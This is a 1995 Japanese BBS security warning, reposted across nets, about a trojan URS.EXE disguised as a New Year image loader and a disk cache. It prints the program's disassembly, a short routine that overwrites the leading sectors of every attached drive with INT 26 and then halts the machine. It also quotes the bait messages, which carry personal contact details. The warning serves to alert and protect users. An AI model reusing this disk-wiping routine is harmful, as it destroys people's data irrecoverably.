ウィルス情報

以下、たむたむＮＥＴ（京都）よりの転載です
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−

NIFTY-Serve ＜全国 BBS運営者フォーラム＞ FBBSS
   MES(11):［案内・告知］ＦＢＢＳＳ情報サロン 95/01/06 -  からの転載です。

被害を最小限に留めるため、以下のメッセージを転載可能な限り転載して下さい。

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


00125/00125 TBE00665  HAL.Sugawa       【注意喚起】
(11)   95/01/04 21:25

　数日前から KTBBS  系のネットのいくつかでで以下のようなメッセージが流
されています。

======================================================================
========= >Message # 216 is from: BELGUEST 
>Time: 95/01/03 20:31:20 Section 3: なんでもＯＫのフリートーク
>Subj: 謹賀新年ＣＧ
>
>あけましておめでとうございます．
>みなさまお邪魔します．
>うる星やつら−ＮＥＴの宣伝ＣＧです．
>なお，ＣＧを表示するためのローダは同梱のURS.EXEをお使いください．
>コマンドライン入力により，ヘルプが見れます。
>
><<< urusei_y.lzh for MS-DOS ( use ish & lha ) [ 724 lines ] >>>
【ish部分は危険により削除】
>--- urusei_y.lzh (724/724) ---
>
>うる星やつら−ＮＥＴ  Ｓystem Ｏperator  蟹瀬 雄太郎
>
>Telephone : 045-547-9498
>            300/1200/2400/9600/14400/28800bps V.Fast/V.32/V.36ter/V.42/V.42bi
s
>Facsimile : 045-548-1008 (G3 Mode only)
>Postal No.: 223-00
>Address   : 神奈川県 横浜市 港北区 樽町 2-21-304
>Internet  : UUCP:/http//www.keio-u.ac.jp@pr.89050337//yuu.kanise
==============================================================================
=

《ish部分を解凍した内容》

Listing of archive : URUSEI_Y.LZH

  Name          Original    Packed  Ratio   Date     Time   Attr Type  CRC
--------------  --------  -------- ------ -------- -------- ---- ----- ----
  URS.EXE          35571     15045  42.3% 92-11-06 19:29:18 a--w -lh5- E077
  LUM2.DAT          4097      3618  88.3% 92-11-02 20:13:26 a--w -lh5- 6F24
  LUM3.DAT          4097      3618  88.3% 92-11-02 20:13:26 a--w -lh5- 1246
  LUM4.DAT          4097      3617  88.3% 92-11-02 20:13:26 a--w -lh5- 4B77
  LUM5.DAT          4097      3618  88.3% 92-11-02 20:13:26 a--w -lh5- 0A2D
  LUM6.DAT          4097      3617  88.3% 92-11-02 20:13:26 a--w -lh5- C778
  LUM7.DAT          4097      3618  88.3% 92-11-02 20:13:26 a--w -lh5- 5C8B
  LUM8.DAT          4097      3613  88.2% 92-11-02 20:13:26 a--w -lh5- 5A1A
  LUM9.DAT          4097      3616  88.3% 92-11-02 20:13:26 a--w -lh5- D546
  LUM1.DAT          4097      3617  88.3% 92-11-02 20:13:26 a--w -lh5- 7E81
--------------  --------  -------- ------ -------- --------
    10 files       72444     47597  65.7% 92-11-07 00:08:46

　上記内容のうち、URS.EXE は絶対に実行しないでください。ディスアセンブ
ルした内容を以下に提示します。

0100 60             PUSHA
0101 B000           MOV AL,00   ;0:カレントドライブ
0103 BB0000         MOV BX,0000 ;データバッファ先頭アドレス
0106 B9A000         MOV CX,00A0 ;ライトするセクタ数
0109 BA0000         MOV DX,0000 ;開始セクタ番号
010C CD26           INT 26      ;物理セクタライト
010E B001           MOV AL,01   ;A:ドライブ
0110 BB0000         MOV BX,0000
0113 B9A000         MOV CX,00A0
0116 BA0000         MOV DX,0000
0119 CD26           INT 26
011B B002           MOV AL,02   ;B:ドライブ
011D BB0000         MOV BX,0000
0120 B95000         MOV CX,0050
0123 BA0000         MOV DX,0000
0126 CD26           INT 26
0128 B003           MOV AL,03   ;C:ドライブ
012A BB0000         MOV BX,0000
012D B95000         MOV CX,0050
0130 BA0000         MOV DX,0000
0133 CD26           INT 26
0135 B004           MOV AL,04   ;D:ドライブ
0137 BB0000         MOV BX,0000
013A B95000         MOV CX,0050
013D BA0000         MOV DX,0000
0140 CD26           INT 26
0142 61             POPA
0143 B80000         MOV AX,0000 ;CPU SHUTDOWN
0146 E7F0           OUT F0,AX
0148 99             CWD         ;これ以下はゴミ
0149 0270B1         ADD DH,[BX+SI-4F]
                :

　要するに、接続されているドライ部を順次移動しながらすべての先頭セクタ
を書きつぶすものです。最後にリブートをかけています。内容的にはウィルス
とも呼べない程度の低いものですが、結果としては修復不能のディスク破壊を
起こします。 万一このメッセージが流れた場合は、気付いた SYSOP は直ちに
削除すると同時に、すでにダウンロードした会員に対して実行の禁止措置を取
られるようお知らせします。

                                           1995/01/04 (Wed) 【ＨＡＬ】

00128/00128 TBE00665  HAL.Sugawa       RE:【注意喚起】
(11)   95/01/05 22:44  00125へのコメント


　このメッセージにつきましては、さらなる被害の広がるのを防ぐために転載
を無条件で許可します。どうぞ自由に転載してください。追加情報として、以
下を加えます。

(1) うる星やつらネットの宣伝と銘打ったもの

----------------------------------------------------------------------
(a)
あけましておめでとうございます．
みなさまお邪魔します．
うる星やつら−ＮＥＴの宣伝ＣＧです．
なお，ＣＧを表示するためのローダは同梱のURS.EXEをお使いください．
コマンドライン入力により，ヘルプが見れます。

<<< urusei_y.lzh for MS-DOS ( use ish & lha ) [ 724 lines ] >>>
【ish部分は危険により削除】
--- urusei_y.lzh (724/724) ---

うる星やつら−ＮＥＴ  Ｓystem Ｏperator  蟹瀬 雄太郎

Telephone : 045-547-9498
            300/1200/2400/9600/14400/28800bps V.Fast/V.32/V.36ter/V.42/V.42bis

Facsimile : 045-548-1008 (G3 Mode only)
Postal No.: 223-00
Address   : 神奈川県 横浜市 港北区 樽町 2-21-304
Internet  : UUCP:/http//www.keio-u.ac.jp@pr.89050337//yuu.kanise

----------------------------------------------------------------------
(b)
| Message  # 204 is from: GUEST 
| Time: 95/01/02  0:05:13 Section 10: ゲストコーナー
| Subj: 謹賀新年．ネット紹介です．

あけましておめでとうございます。
みなさまお邪魔します。
うる星やつら−ＮＥＴの宣伝ＣＧです．
なお，ＣＧを表示するためのローダは同梱のURS.EXEをお使いください．
コマンドライン入力により，ヘルプが見れます。

【ish部分は危険により削除】

うる星やつら−ＮＥＴ  Ｓystem Ｏperator  蟹瀬 雄太郎

Telephone : 0274-82-4425
            300/1200/2400/9600/14400/28800Bps V.Fast/V.32Fast/V.42/V.42Bis
Facsimile : 0274-82-1008 (G3 Mode only)
Postal No.: 370-26
Address   : 群馬県 甘楽郡 下仁田町 下仁田 317-16
Internet  : UUCP:/http//www.Gunma-u.ac.jp@pr.89050337//yuu.kanise


(2) XMS 版高速ディスクキャッシュと銘打ったもの

----------------------------------------------------------------------
すみません,バイナリーファイルのアップが出来なかったので,
Ishを用いてテキストアップさせて戴きました.

XMS版高速ディスクキャッシュ URS.EXE Version 1.02 (Ｕltra Ｒeading Ｓpeed)
                            Copyright (c) Ｙutaro Ｋanise 1995/01/01
ISH 部分共通

　以上２パターンの他に「マシン評価システム」と銘打ったパターンもあるそ
うです。当該メッセージにこの情報も附加し、転載自由で可能な範囲で転載を
行い、被害の拡大の抑制を行なってください。

                                           1995/01/05 (Thu) 【ＨＡＬ】

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−

以上、たむたむＮＥＴ（京都）よりの転載でした